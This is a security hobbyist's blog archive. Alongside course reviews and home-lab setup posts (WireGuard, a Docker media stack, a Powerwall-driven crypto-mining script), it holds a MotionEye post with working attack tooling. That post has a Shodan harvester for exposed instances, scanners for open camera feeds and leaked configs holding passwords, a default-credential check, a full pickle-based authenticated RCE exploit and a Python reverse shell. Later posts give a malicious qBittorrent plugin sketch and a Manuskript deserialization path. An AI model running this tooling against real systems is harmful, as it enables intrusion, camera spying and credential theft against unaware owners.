Category Archives: blog

Offensive Security PEN-300 Evasion Techniques and Breaching Defenses – Course and Exam Review

You know, OffSec describes the OSEP as: “Evasion Techniques and Breaching Defenses (PEN-300) is an advanced penetration testing course”. I don’t know how advanced it is, if I can pass, lol. I generally have no idea what I’m doing.

Anyway, I really liked the course. There is a lot of material to keep you busy. Unless you’re already familiar with a large chunk of the topics, you’re probably best served by purchasing the 90-day version of the course. The challenge labs are fun. Make sure you do them before the exam.

The exam was challenging, but fair. You should be able to figure out what you need to do next somewhat quickly, but executing it may be a different story, if you’re anything like me. Just ask yourself, “What did I just accomplish, and what does that allow me to do now?” If you’ve completed the challenge labs, you will be well-prepared for the exam. Some people say to make sure you do all the questions and extra miles in the lab manual, but I only did, I don’t know, 30% of them?

I don’t know what’s next for me. I have a voucher to do the OSED, but I’m a little burned out at this point. I’ll probably put that off until the summer – because who doesn’t like sitting inside and writing exploits when the weather is nice?

Do More with Tree (and why you should read the docs)

If you aren’t familiar with the Tree command in Linux, you should be. You can read about it here. Tree has been around for what seems like forever, and I’ve been using it for as long as I’ve been using Linux. With that said, I didn’t really know all that much about it until recently. The extent of my usage has always been something like this: $ tree -L 3 and that’s it.

Like most other Linux tools, there is much more to Tree than what I know. Take a look at the following command:

$ tree -LpDugC 2 -H .  > index.html 

This creates an index.html file containing an HTML listing of everything in the current directory, two levels deep (-L 2), along with permissions (-p), last-modification dates (-D), owner (-u), group (-g), and colorized output (-C). The -H . flag turns on HTML output using the current directory as the base href.

Anyway, you can install tree on Linux, Mac, and even Windows. There really wasn’t a huge point to this post — it’s just a reminder that your tools can do a lot more than what you’re probably already using them for. It pays to read the documentation.

Learning Go By Writing a POC for Gitlab CVE-2021-22205

I’ve been wanting to learn Go, and I learn by doing, so I decided to write a POC for CVE-2021-22205, a fairly straightforward RCE in GitLab that dropped a few weeks ago. My process for developing it went like this:

  1. Do thirty seconds of research to find a prior Golang POC for this CVE. I didn’t find one, but I’m sure they exist somewhere. I still would have written this even if I had found one; it would give me something to compare my poorly written code to.
  2. Start writing code. My thoughts the whole time while I was writing this were some variation of the following, “There must be a better way to do this.”
  3. Test.
  4. Rewrite.
  5. Repeat above for about 6 hours.
  6. Success!

I’m going to need more practice. I’ve been so used to Python for the last ten years that moving to Golang is going to take some work.

Anyway, here is a link to my POC.

Tesla Solar, Powerwalls, Docker, Python, and Crypto Mining

I had Tesla solar panels and Powerwalls installed several weeks ago. I currently don’t have permission to operate (PTO) from my electricity provider, which means I can’t ship any of my surplus power back to the grid. So, after my batteries fill up for the day, I usually have power production that is going to waste. What can I do with that power?

Mine crypto, that’s what I can do! Those of you who know me IRL know that I’ve been involved in crypto for a decade. Mining isn’t new to me, but I mostly gave up on it in 2012/2013, when I was only mining a few Bitcoin a month and it wasn’t worth it to me anymore. Talk about a wrong decision…

I digress. I’m sitting here now producing extra power. Mining crypto with a graphics card that I already have will make me around $50-100/month and give me a chance to whip up a script in Python, which is what I truly enjoy in life. I haven’t done the actual math on it, but I think mining crypto is more profitable than selling my power back to my utility provider. It is also more fun to mine, lol.

The workstation that I’ll be mining on has a single Gigabyte 1080 Ti. It’s a little old, but they’re still going for $700 on eBay these days. I’m running Ubuntu 20.04, and I’ve decided to mine with a Docker container, pointing my card at an ethash endpoint from NiceHash. I need to do some research to see if there are better options, which I assume exist.

My overall strategy for this operation will be pretty simple to start off. I’m just going to mine when my batteries are charged above a certain threshold. I set this threshold in the variable BATTERY_CHARGE_TO_START_MINING in the code. Yeah, I like long variable names.

Fortunately, Tesla provides an API to gather information from the Powerwall and there is a Python package to query it. To install this package use the following command:

pip3 install tesla_powerwall

And since I use this Docker image to run the T-Rex miner app, we also need to install the docker Python package.

pip3 install docker

This script is pretty straightforward. I create a Docker client to manage the miner container. I then create a Miner object with my wallet address and mining URL; this class has methods to start and stop the miner, as well as to check whether it is running.

Then, in a while loop I check my battery level and start and stop the miner as appropriate. I repeat this every HOW_OFTEN_TO_CHECK seconds.

Here is the code:

#!/usr/bin/env python3

import os
from tesla_powerwall import Powerwall
import docker
import time

POWERWALL_URL = ""  # PowerWall Gateway address goes here
EMAIL = ""  # email address that you use to login into the gateway
PASSWD = ""  # password that you use to log into the gateway
WALLET_ADDRESS = "35kwhvhyfnVnGdoWdyLqrtaHeY7RYByPfW"  # mining wallet address
MINING_URL = (
    "stratum+tcp://daggerhashimoto.usa-east.nicehash.com:3353"  # Mining url
)
# lowest battery charge where mining will start
BATTERY_CHARGE_TO_START_MINING = 50
# how often to check whether the battery level allows mining, in seconds
HOW_OFTEN_TO_CHECK = 1800


def init():
    # initialize powerwall object and api
    powerwall = Powerwall(
        endpoint=POWERWALL_URL,
        timeout=10,
        http_session=None,
        verify_ssl=False,
        disable_insecure_warning=True,
        pin_version=None,
    )
    powerwall.login(PASSWD, EMAIL)

    api = powerwall.get_api()

    return powerwall, api


class Miner:
    def __init__(self, client, wallet_address, mining_url):
        self.wallet_address = wallet_address
        self.mining_url = mining_url
        self.client = client

    def start_miner(self, client):
        env_vars = {
            "WALLET": self.wallet_address,
            "SERVER": self.mining_url,
            "WORKER": "Rig",
            "ALGO": "ethash",
        }
        try:
            client.containers.run(
                "ptrfrll/nv-docker-trex:cuda11",
                detach=True,
                runtime="nvidia",
                name="trex-miner",
                ports={4067: 4067},
                environment=env_vars,
            )
        except docker.errors.APIError:
            # the container already exists, so just restart it
            client.containers.get("trex-miner").restart()

    def stop_miner(self, client):
        trex = client.containers.get("trex-miner")
        trex.stop()

    def is_running(self):
        try:
            container = self.client.containers.get("trex-miner")
            return container.status == "running"
        except docker.errors.NotFound:
            return False


if __name__ == "__main__":
    powerwall, api = init()

    client = docker.from_env()

    miner = Miner(client, WALLET_ADDRESS, MINING_URL)

    miner.start_miner(client)

    while True:
        # powerwall charge is satisfactory, start mining
        if not miner.is_running() and (
            api.get_system_status_soe()["percentage"]
            > BATTERY_CHARGE_TO_START_MINING
        ):
            miner.start_miner(client)
            print("miner is running or will be started")
        # powerwall charge is too low, shut off mining
        elif miner.is_running() and (
            api.get_system_status_soe()["percentage"]
            < BATTERY_CHARGE_TO_START_MINING
        ):
            print("stopping miner")
            miner.stop_miner(client)
        # try again
        time.sleep(HOW_OFTEN_TO_CHECK)

You can also find future updates of the code here.

TODO: add more options to start/stop mining, e.g., whether my panels/batteries are connected to the grid, start/stop mining based on the weather, etc.

TODO: rewrite in Golang. Trying to learn Go.

Hacking MotionEye/MotionEyeOS

Getting Started with MotionEye

MotionEye is an open-source, web-based GUI for the popular Motion CLI application found on Linux. I’ve known of the Motion command-line app for years, but I didn’t know that MotionEye existed. I ran across it while trying to find a multi-webcam, GUI- or web-based solution for future projects.

MotionEye comes in a couple of forms: a standalone app (I used the Docker container version), or a “whole” operating system, MotionEyeOS, that you install on a Raspberry Pi.

Starting off, I used a Shodan search to find internet-facing installations. Here is the script I used for that. If you use this script, you’ll need to put in your API key and set the limit parameter, which caps the number of API query credits you use.

#!/usr/bin/env python3

import sys
# pip3 install shodan
from shodan import Shodan

api = Shodan('') # Insert API key here

# check for api key
if api.api_key == '':
    print("No API key found! Exiting")
    sys.exit(1)

limit = 1000 # set this to limit your api query usage
counter = 0

url_file = open("urls.txt", "w")

for response in api.search_cursor('Server: motionEye'):
    ip = response['ip_str']
    port = response['port']
    url = f'http://{ip}:{port}'
    url_file.write(url + '\n')

    # Keep track of how many results have been downloaded so we don't use up all our query credits
    counter += 1
    if counter >= limit:
        break

url_file.close()

I ran out of query credits when I ran this script; there are thousands of installations out there. The script writes the URL (IP address and port) of each installation it finds to urls.txt.

Finding Live Feeds

In my review of the application, I found that you can make a request to the /picture/{camera-number}/current/ endpoint, and if it returns a 200 status code, the feed is open to the public. You can also increment the camera-number to enumerate how many cameras an installation actually has, even if they aren’t available to view.

I took the output of the motioneye-shodan.py script above and fed it to the live-feeds.py script below.

#!/usr/bin/env python3

import requests

url_file = open("urls.txt", "r")
urls = url_file.readlines()
url_file.close()

live_urls = open("live-urls.txt", "w")

for url in urls:
    url = url.strip()  # readlines() leaves a trailing newline on each URL
    try:
        status_code = requests.get(url + "/picture/0/current/", verify=False, timeout=3).status_code
        print(status_code)
        if status_code == 200:
            live_urls.write(url + "\n")
    except requests.exceptions.RequestException:
        pass

live_urls.close()

This script writes the URLs of the camera feeds that we can view to live-urls.txt. But the real question here is: what security issues are there with MotionEye?

Information Leakage

It turns out that if you make a GET request to the /config/list endpoint, some installations will return their config files. Most of the time these config files are innocuous. I’m not sure why they are publicly accessible at all, even when the feed itself is public. Maybe the endpoint is used as an API of some sort; I need to dig into the code some more.

However, sometimes these config files contain some very sensitive information. Consider the following config with email_notifications_smtp_password and email_notifications_addresses removed. These passwords are supposed to be for services that the public cannot access, but unfortunately people like to reuse passwords. Again, why is this file even readable?

Along with the occasional password, email addresses are in here, internal IP addresses and ports, mounting points for local drives, etc.
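
As an illustration, here is a minimal sketch (my own addition, not part of the original tooling) that pulls /config/list from every host in the live-urls.txt file produced above and flags anything that looks like a credential. The keyword list is just an example; adjust it to taste.

#!/usr/bin/env python3

import requests

# keywords that suggest a config value worth a closer look; purely illustrative
INTERESTING = ("password", "email", "smtp", "user")

with open("live-urls.txt") as f:
    urls = [line.strip() for line in f if line.strip()]

for url in urls:
    try:
        response = requests.get(url + "/config/list", verify=False, timeout=3)
    except requests.exceptions.RequestException:
        continue
    if response.status_code != 200:
        continue
    for line in response.text.splitlines():
        if any(word in line.lower() for word in INTERESTING):
            print(f"{url}: {line.strip()}")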

Rate-Limiting and Default Credentials

So, the default installation of MotionEye uses the username admin with a blank password. Additionally, MotionEye does not seem to impose any sort of rate limiting on login attempts. This is a recipe for disaster.
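
As a rough illustration (a sketch of my own, not a polished tool), checking whether an instance still accepts the default login can look something like the snippet below. It reuses the same /login/ request shape as the exploit script later in this post; treat the 200-status check as a heuristic that may need adjusting.

#!/usr/bin/env python3

import sys

import requests


def default_creds_accepted(base_url, username="admin", password=""):
    """Heuristic check: does this MotionEye instance accept the default admin login?"""
    session = requests.Session()
    body = f"username={username}&password={password}"
    response = session.post(f"{base_url}/login/", data=body, timeout=5)
    return response.status_code == 200


if __name__ == "__main__":
    # usage: ./default-creds.py http://1.2.3.4:8765
    print(default_creds_accepted(sys.argv[1]))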

Authenticated RCE Method #1

Once logged in, I found two simple methods of code execution. The first is a classic Python cPickle deserialization exploit.

In the configuration section of the application, there is an option to back up and restore the application configuration. It turns out that if you include a malicious tasks.pickle file in the config you restore, it’ll be written to disk and then loaded when the application is restarted, whether automatically or manually.

You can simply download the current configuration to use as a template. After downloading and extracting it, slide your malicious tasks.pickle file in and tar.gz everything back up.

The final structure of my motioneye-config.tar.gz for the docker container is as follows:

├── camera-1.conf
├── motion.conf
├── motioneye.conf
└── tasks.pickle

Alternatively, the final structure of my motioneye-config.tar.gz on MotionEyeOS is the following:

├── adjtime
├── camera-1.conf
├── crontabs
├── date.conf
├── localtime -> /usr/share/zoneinfo/UTC
├── motion.conf
├── motioneye.conf
├── ntp.conf
├── os.conf
├── proftpd.conf
├── shadow
├── shadow-
├── smb.conf
├── ssh
│   ├── ssh_host_dsa_key
│   ├── ssh_host_dsa_key.pub
│   ├── ssh_host_ecdsa_key
│   ├── ssh_host_ecdsa_key.pub
│   ├── ssh_host_ed25519_key
│   ├── ssh_host_ed25519_key.pub
│   ├── ssh_host_rsa_key
│   └── ssh_host_rsa_key.pub
├── static_ip.conf
├── tasks.pickle
├── version
├── watch.conf
└── wpa_supplicant.conf

Pause here: yes, those are SSH host keys, so you might ask why we don’t just try SSH. Go for it; you may not even need a password. But plenty of people have either hardened or disabled SSH on the actual Raspberry Pi, so it won’t always work. A lot of these instances will have SSH turned off entirely, and if MotionEye is running in Docker, you probably won’t be able to grab usable SSH keys anyway. Also, it is more fun to write scripts in Python.

Once the configuration is uploaded, wait for the app to reload, or, in unfortunate cases, wait for it to be rebooted by mother nature or the victim. From what I can see, the Docker version of the application will not reboot itself. Here is a Python 3 script that will do all of this. Also, see the GitHub repo, which may be more up to date.

#!/usr/bin/env python3

import requests
import argparse
import os
import pickle
import hashlib
import tarfile
import time
import string
import random
from requests_toolbelt import MultipartEncoder
import json


# proxies = {"http": "http://127.0.0.1:9090", "https": "http://127.0.0.1:9090"}
proxies = {}


def get_cli_args():
    parser = argparse.ArgumentParser(description="MotionEye Authenticated RCE Exploit")
    parser.add_argument(
        "--victim",
        help="Victim url in format ip:port, or just ip if port 80",
        required=True,
    )
    parser.add_argument("--attacker", help="ipaddress:port of attacker", required=True)
    parser.add_argument(
        "--username", help="username of web interface, default=admin", default="admin"
    )
    parser.add_argument(
        "--password", help="password of web interface, default=blank", default=""
    )
    args = parser.parse_args()
    return args


def login(username, password, victim_url):
    session = requests.Session()
    useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
    headers = {"User-Agent": useragent}
    login_url = f"http://{victim_url}/login/"
    body = f"username={username}&password={password}"
    session.post(login_url, headers=headers, data=body)
    return session


def download_config(username, victim_url, session):
    download_url = f"http://{victim_url}/config/backup/?_username={username}&_signature=5907c8158417212fbef26936d3e5d8a04178b46f"
    backup_file = session.get(download_url)
    open("motioneye-config.tar.gz", "wb").write(backup_file.content)
    return


def create_pickle(ip_address, port):
    # build your reverse-shell command here, e.g. from the attacker ip_address and port
    shellcode = ""  # put your shellcode here

    class EvilPickle(object):
        def __reduce__(self):
            cmd = shellcode
            return os.system, (cmd,)

    # need protocol=2 and fix_imports=True for python2 compatibility
    pickle_data = pickle.dumps(EvilPickle(), protocol=2, fix_imports=True)
    with open("tasks.pickle", "wb") as file:
        file.write(pickle_data)
        file.close()
    return


def decompress_add_file_recompress():
    # extract the original backup, then remove the old archive
    with tarfile.open("./motioneye-config.tar.gz") as original_backup:
        original_backup.extractall("./motioneye-config")
    os.remove("./motioneye-config.tar.gz")
    # move malicious tasks.pickle into the extracted directory and then tar and gz it back up
    os.rename("./tasks.pickle", "./motioneye-config/tasks.pickle")
    with tarfile.open("./motioneye-config.tar.gz", "w:gz") as config_tar:
        config_tar.add("./motioneye-config/", arcname=".")
    return


def restore_config(username, password, victim_url, session):
    # a lot of this is not necessary, but makes for good tradecraft
    # recreated 'normal' requests as closely as I could
    t = int(time.time() * 1000)
    path = f"/config/restore/?_={t}&_username={username}"
    # admin_hash is the sha1 hash of the admin's password, which is '' in the default case
    admin_hash = hashlib.sha1(password.encode("utf-8")).hexdigest().lower()
    signature = (
        hashlib.sha1(f"POST:{path}::{admin_hash}".encode("utf-8")).hexdigest().lower()
    )
    restore_url = f"http://{victim_url}/config/restore/?_={t}&_username=admin&_signature={signature}"

    # motioneye checks for "---" as a form boundary. Python Requests only prepends "--"
    # so we have to manually create this
    files = {
        "files": (
            "motioneye-config.tar.gz",
            open("motioneye-config.tar.gz", "rb"),
            "application/gzip",
        )
    }

    useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
    boundary = "----WebKitFormBoundary" + "".join(
        random.sample(string.ascii_letters + string.digits, 16)
    )

    m = MultipartEncoder(fields=files, boundary=boundary)
    headers = {
        "Content-Type": m.content_type,
        "User-Agent": useragent,
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": "meye_username=_; monitor_info_1=; motion_detected_1=false; capture_fps_1=5.6",
        "Origin": f"http://{victim_url}",
        "Referer": f"http://{victim_url}",
        "Accept-Language": "en-US,en;q=0.9",
    }
    response = session.post(restore_url, data=m, headers=headers, proxies=proxies)
    # if response == reboot false then we need reboot routine
    content = json.loads(response.content.decode("utf-8"))

    if content["reboot"] == True:
        print("Rebooting! Stand by for shell!")
    else:
        print("Manual reboot needed!")
    return


if __name__ == "__main__":
    print("Running exploit!")
    arguments = get_cli_args()
    session = login(arguments.username, arguments.password, arguments.victim)
    download_config(arguments.username, arguments.victim, session)
    # sends attacker ip and port as arguments to create the pickle
    create_pickle(arguments.attacker.split(":")[0], arguments.attacker.split(":")[1])
    decompress_add_file_recompress()
    restore_config(arguments.username, arguments.password, arguments.victim, session)

Authenticated RCE Method #2

Another method of code execution involves motion detection. There is an option to run a system command whenever motion is detected. The security implications of this are obvious.

(Screenshot: a Python reverse shell set as the command to run when motion is detected.)
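
To illustrate the kind of payload shown above, here is a minimal Python reverse shell sketch (the attacker address 10.0.0.5:4444 is a placeholder). Wrapped in python3 -c '...', something like this could be set as the command to run when motion is detected.

#!/usr/bin/env python3

# minimal reverse shell sketch; 10.0.0.5:4444 is a placeholder attacker address
import os
import socket
import subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.5", 4444))       # connect back to the attacker's listener
for fd in (0, 1, 2):                # point stdin/stdout/stderr at the socket
    os.dup2(s.fileno(), fd)
subprocess.call(["/bin/sh", "-i"])  # hand the attacker an interactive shell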

Conclusion

While authentication is needed for RCE, the presence of default credentials and lack of rate limiting make obtaining authentication straightforward. There are a lot of people running this software in a vulnerable manner.

As per my usual advice, don’t expose MotionEye to the WWW. As with all self-hosted solutions, I advise you to have it face your internal network only and to connect to that network via OpenVPN or WireGuard.

Update: I was given CVE-2021-44255 for the Python pickle exploit.

Wireguard to Your House

Instructions:

  • Run Wireguard on your home server and select a port that you’d like to face externally.
  • Port forward that port in your router to your server. Let’s use port 12345.
  • Create public and private keys on your server.
  • Create conf file on your server.
  • Create keys and conf file on clients (phone, notebook, tablet, etc).
  • Enter keys in conf files.
  • Connect clients to home server.

Here is a sample with confs for both a server and a client. Enter your own information as needed, and don’t forget to set your own network interface name in the iptables commands.

# home server wg0.conf

[Interface]
PrivateKey = # server privkey here 
Address = 192.168.2.1
ListenPort = 12345

PostUp   = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp0s31f6 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp0s31f6 -j MASQUERADE

[Peer]
# notebook
PublicKey = # notebook pubkey here
AllowedIPs = 192.168.2.2

# notebook wg0.conf

[Interface]
PrivateKey = # notebook privkey here
Address = 192.168.2.2 # must match the AllowedIPs entry for this peer on the server
DNS = 192.168.1.125 # dns server (pihole) address on my home network

[Peer]
PublicKey = # server pubkey here
Endpoint = 1.2.3.4:12345 # your home ip address and wireguard port
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 21

So, in this case, port 12345 should be set up for port forwarding. Your clients will connect back to port 12345 on your home IP address. If you have a dynamic IP address at home, you’ll need a solution for that, like a custom script, DDNS, or even a VPS as some sort of jump host.

If you can’t open a port, you could run the server on a Linode instance (with my referral, of course, lol), which would be very cheap. A Nanode is $5 a month, and you can use it for other stuff too. Then connect everything to it, and your phone and home server are on the same network.

Docker Compose – Plex with Plex Pass, Jackett, Sonarr, Radarr, Lidarr, qBittorrent, and PIA

Update: Now with prowlarr, too.

This docker-compose.yml file will run all of these services. This post assumes that you already have a little technical knowledge and that you have Docker and Docker Compose installed. All downloading runs through qBittorrent and is encrypted over the PIA VPN.

Here is the directory structure that this compose file needs.

/home
└── user
    ├── data
    │   ├── movies
    │   ├── music
    │   └── television
    └── data2
        ├── config
        ├── data
        ├── jackett
        ├── lidarr
        ├── radarr
        ├── sonarr
        └── prowlarr
/var
└── docker
    └── plex
        ├── config
        └── transcode

You’ll need to update the docker-compose file with your username. My username is user, so that is what you see in the structure above.

You can make these directories and set permissions with the following commands on Linux.

mkdir -p /home/$USER/data/{movies,music,television}
mkdir -p /home/$USER/data2/{config,data,jackett,lidarr,radarr,sonarr,prowlarr}
sudo mkdir -p /var/docker/plex/{config,transcode}
sudo chown $USER:$USER /var/docker/plex/{config,transcode}

In the docker-compose file, you’ll need to enter your PIA username and password. The Plex service is set up for Plex Pass usage, so you’ll need to enter your Plex claim token. Once everything is rolling, you’ll need to update the path mappings in Sonarr, Radarr, and Lidarr. You do this under Settings > Download Clients in each application.

You also need to set up the download client in Sonarr, Radarr, and Lidarr. You can do this through Settings > Download Clients; click the big plus button to add a client. If you’re not using SSL for your qBittorrent instance, you won’t need to check that box, and the same goes for password protection. If you’re looking to use SSL, you can check out this post of mine.

Now you need to set up Jackett with your indexers. This will be different for everybody, so follow the instructions that are widely available.

As promised, here is the docker-compose.yml file. You may need to change your UID/GID to what is applicable to your installation/user. Please read it thoroughly – especially the comments. There are things you will need to change.

version: '3.8'
services:
    
    pms-docker:
        container_name: plex
        network_mode: host
        hostname: plex
        runtime: nvidia
        environment:
            - TZ=America/New_York
            - PLEX_UID=1000
            - PLEX_GID=1000
            - PLEX_CLAIM=<your claim here> 
            - ADVERTISE_IP= #ip:port here e.g. http://127.0.0.1:32400
            - NVIDIA_VISIBLE_DEVICES=GPU-04aeacae-0ae1-25b6-1504-a4bec4ed2da9 #change as needed
            - NVIDIA_DRIVER_CAPABILITIES=compute,video,utility
        volumes:
            - /var/docker/plex/config:/config
            - /var/docker/plex/transcode:/transcode
            - /home/user/data/television:/data/tvshows
            - /home/user/data/movies:/data/movies
            - /home/user/data/music:/data/music
        restart: unless-stopped
        devices:
            - /dev/dri/card0:/dev/dri/card0 #your devices go here
            - /dev/dri/renderD128:/dev/dri/renderD128 #may be different
        image: plexinc/pms-docker:plexpass
    
    arch-qbittorrentvpn:
        container_name: qbittorrentvpn
        hostname: qbittorrentvpn
        cap_add: 
            - NET_ADMIN
        ports:
            - '6881:6881'
            - '6881:6881/udp'
            - '6969:6969'
            - '8118:8118'
        restart: unless-stopped
        volumes:
            - '/home/user/data2/data:/data'
            - '/home/user/data2/config:/config'
            - '/etc/localtime:/etc/localtime:ro'
        environment:
            - VPN_ENABLED=yes
            - VPN_USER= #put your PIA username here
            - VPN_PASS= #put your PIA password here
            - VPN_PROV=pia
            - VPN_CLIENT=openvpn
            - STRICT_PORT_FORWARD=yes
            - ENABLE_PRIVOXY=yes
            - LAN_NETWORK=192.168.1.0/24 #possibly different
            - 'NAME_SERVERS=209.222.18.222,84.200.69.80,37.235.1.174,1.1.1.1,209.222.18.218,37.235.1.177,84.200.70.40,1.0.0.1'
            - VPN_INPUT_PORTS=1234
            - VPN_OUTPUT_PORTS=5678
            - DEBUG=false
            - WEBUI_PORT=6969 #not the default change in webui
            - UMASK=000
            - PUID=1000
            - PGID=1000
        sysctls:
            - net.ipv6.conf.all.disable_ipv6=1
        image: binhex/arch-qbittorrentvpn

    jackett:
        image: ghcr.io/linuxserver/jackett
        container_name: jackett
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
            - AUTO_UPDATE=true 
            - RUN_OPTS=<run options here>
        volumes:
            - /home/user/data2/jackett/config:/config
            - /home/user/data2/data:/downloads
        network_mode: host #9117
        restart: unless-stopped
    
    radarr:
        image: ghcr.io/linuxserver/radarr
        container_name: radarr
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
        volumes:
            - /home/user/data2/radarr:/config
            - /home/user/data/movies:/movies
            - /home/user/data2/data:/downloads
        network_mode: host #7878
        restart: unless-stopped

    sonarr:
        image: ghcr.io/linuxserver/sonarr
        container_name: sonarr
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
        volumes:
            - /home/user/data2/sonarr:/config
            - /home/user/data/television:/tv
            - /home/user/data2/data:/downloads
        network_mode: host #8989
        restart: unless-stopped

    lidarr:
        image: ghcr.io/linuxserver/lidarr
        container_name: lidarr
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
        volumes:
            - /home/user/data2/lidarr:/config
            - /home/user/data/music:/music 
            - /home/user/data2/data:/downloads 
        network_mode: host #8686:8686
        restart: unless-stopped
  
    prowlarr:
        image: lscr.io/linuxserver/prowlarr:develop
        container_name: prowlarr
        environment:
            - PUID=1000
            - PGID=1000
            - TZ=America/New_York
        # put your directories here
        volumes:
            - /home/user/data2/prowlarr:/config
        network_mode: host #9696
        restart: unless-stopped

Now you should be able to cd into the directory that contains this docker compose file, and then run

sudo docker compose up

# or the following, so output isn't printed to screen

sudo docker compose up -d  

This post should point you in the right direction, at least. I’m not responsible for any errors. Things may have been updated since I wrote this post. Special thanks to linuxserver.io and binhex for the images.

Advanced Web Attacks and Exploits -AWAE – Exam Review

AWAE Course Overview

For people unfamiliar with this course and exam, here is a link to the Offensive Security website. I’ve also written about it before, so you can check my post history. Basically, the course is a giant PDF and a bunch of videos that go over web application attacks. You then get access to a lab consisting of 13 machines running a wide variety of vulnerable web apps. In terms of languages/DBs/tech, the course covers VS Code, Visual Studio, JD-GUI, JavaScript, PHP, Node, Python, Java, C#, MySQL, and Postgres, so it’s pretty thorough.

The exam is 48 hours long, and they give you access to two machines running vulnerable web apps. You have to bypass auth on them to get administrator access and then escalate your attack to full-blown remote code execution. You also get two debugging machines running the same apps as the exam machines, with full access to the app source code – this is a white-box course, after all. You have to review the code base and then use the debugging machines to develop a ‘one-shot’ exploit script that bypasses auth and triggers RCE. I used Python, as do most people, I think.

Oh yeah, and they watch you on camera the whole time.

After the exam time is up, assuming you have enough points to pass, you have another 24 hours to write an exam report documenting what you found and how you exploited it.

How did it go?

First things first: I had to take this one twice. My power went out twice, briefly, and my father had to go to the hospital (he’s fine) during my first attempt. Even though he lives hours away, and there wasn’t much I could do, I was a little distracted. And it wasn’t like I was in front of the computer for the full 48 hours. I took a break about every 1.5 hours or so and slept 5-6 hours both nights.

Nevertheless, I still managed RCE on one of the boxes, and if I had another hour or so, I would have had an auth bypass on the second box – which would likely have let me pass. I look back and I just kind of laugh at how I failed it. I missed something simple that would have given me enough points to pass. I even knew what I needed – I just overlooked it.

I actually noticed the vulns on both boxes within an hour of looking at them. I then went down some rabbit holes for a bit and got sidetracked – especially on the box that I considered the harder one.

The second time around I crushed the exam in about 8 hours – RCE on both boxes. I had my report turned in at the 20 hour mark or so – and I was lollygagging.

If you don’t know me, my background is this: I’m not a professional developer. I don’t work in IT. I have never worked in IT. I just like computers. If I can pass this exam, so can you.

Advice and Review

My advice for people preparing to take this exam is to take their time and read the code. You need to know how to get VS Code debugging going; it is a lifesaver, and it is probably hard to pass if you don’t get it working. If you follow the code flow in a debugger, things should pop out at you. With that said, they do throw in a couple of curve balls, which I bet throw some people for a loop. These curve balls aren’t hard to hit, per se, but someone who hasn’t been in the infosec/CTF/bug bounty world may miss them.

Another question that I’ve been asked is, “Do you need an OSCP to do this course?” I’ve changed my mind on this several times, and while I think an OSCP will give you a leg up, you don’t really need one – especially if you’re already involved in the hacking/bug bounty/CTF world. If you’re coming at it straight from being a developer, it may not hurt to expose yourself to this stuff beforehand.

All in all, I’d say the exam was fair and maybe a little on the easy side. I say that as someone that failed it once, too, haha. But not only that, the exam is also a lot of fun. I love the Offensive Security exams. Some people will probably hate me for saying that, but they are a lot of fun.

Malicious qBittorrent Search Plugin: Feature or Bug?

TLDR: Read the code before you install random qBittorrent search plugins.

qBittorrent has a feature that allows you to install a search plugin to search for torrents on your favorite sites. These plugins are written in Python, and although I haven’t reviewed the qBittorrent source code, it appears as if you can simply execute arbitrary code via these plugins. qBittorrent does not seem to do any sort of sanitization.

I added a reverse shell class to an already existing search plugin. The shell should work on Windows and Linux, although qBittorrent seems to be picky about which version of Python you are using. Nevertheless, be aware that arbitrary, unsanitized code can be run via the search plugin feature, as the sketch below illustrates.
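
Here is a rough sketch of what a malicious plugin could look like. The class layout follows the public nova2 search-plugin examples, the payload is a harmless placeholder, and the exact hooks qBittorrent calls may vary between versions, so treat this as illustrative rather than a drop-in plugin.

# evil_example.py - qBittorrent search plugin sketch (layout based on public nova2 examples)
import subprocess


class evil_example(object):
    url = "https://example.com"
    name = "Evil Example"
    supported_categories = {"all": "0"}

    def __init__(self):
        # runs as soon as the search engine instantiates the plugin; an attacker
        # would put a reverse shell here instead of this harmless marker command
        subprocess.Popen(["touch", "/tmp/owned-by-search-plugin"])

    def search(self, what, cat="all"):
        # a legitimate plugin would query a torrent site and print results here
        pass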

Here is a link to the malicious qBittorrent search plugin.

Arbitrary Code Execution in Manuskript < 0.12

Edit: A pull request has been submitted to remove this functionality and to deprecate the old pickled settings, which is a wise security decision.

Edit: This vulnerability has been assigned CVE-2021-35196. It’s currently listed as disputed, even though it is definitely a vulnerability.

I was searching for an alternative to Scrivener to write my future Nobel Prize-winning novel and ran across Manuskript. It looked promising. I found out that it is open source and on GitHub, which is always cool.

I decided to clone it and take a look at it. It’s written in Python, so that is good for me. It’s probably the language I’m most comfortable in these days.

I started checking out the code and immediately noticed that pickle was imported in settings.py. The first thing that should come to mind for any security researcher worth their salt is insecure deserialization via the pickle.loads() and pickle.load() functions.

Sure enough, in settings.py, on lines 190 and 191, the program’s settings are loaded via pickle.loads() and pickle.load(), respectively. Now I just had to figure out how to reach that point in the code.

It turns out that this wasn’t overly tough and it would simply involve loading a project that contains a malicious settings.pickle file. In loadSave.py, the function loadProject() on line 30 is responsible for doing exactly what you think it is supposed to do. You will notice in this function that it checks to see if the project is a zip file, but the project does not have to be a zip file.

I used a zip file in my exploit because that is probably what would be used in a realistic exploitation scenario, e.g., I send a malicious project to a co-writer, editor, or publisher, or I post a sample project of some sort online for others to use.

After the function determines if the project is a zip file or not, it checks the version of the project. This is where you need to do a small amount of work to exploit the insecure deserialization. It turns out that Manuskript has two versions of settings, version 0 and version 1. Version 0 is the one that uses the pickle module to deserialize the settings.

To force the program down the insecure deserialization path, we just need a zip file without a MANUSKRIPT or VERSION text file in the project; the project version will then default to 0, which is what we want.

